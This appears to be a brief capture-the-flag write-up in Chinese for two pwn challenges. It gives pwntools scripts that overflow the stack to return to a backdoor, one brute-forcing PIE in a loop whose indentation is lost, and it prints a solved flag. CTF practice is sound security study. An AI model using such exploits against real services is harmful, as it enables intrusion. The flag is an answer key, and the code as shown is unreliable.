[BJDCTF 2020]babystack2.0





p.sendline('-1'): 通过之前建立的连接,向服务器发送字符串"-1"和一个换行符。这可能是为了触发某个特定的行为或条件。

from pwn import*
p=remote('node4.anna.nssctf.cn',28575)
p.sendline('-1')
payload=b'A'*(0X10+8)+p64(0x40072A)
p.sendline(payload)
p.interactive()


[UUCTF 2022 新生赛]easystack
64位开启了NX和pie



存在栈溢出,但可溢出空间较小
存在backdoor,所以我们需要返回到backdoor
由于溢出长度不够,所以我们需要通过爆破来实现




from pwn import*
while 1:
p=remote('node5.anna.nssctf.cn',27297)
payload=b'A'*(0x100+8)+p64(0x1185)
p.sendline(payload)
if b"You are" in p.recv():
p.interactive()
p.close()


NSSCTF{ab40ec1d-0dfc-457e-b083-092b74750088}

















![探索Langchain与国内智谱清言:构建先进的智能对话系统[第二课]](https://i-blog.csdnimg.cn/direct/0d9faa327170450598281592182e7eb1.png#pic_center)
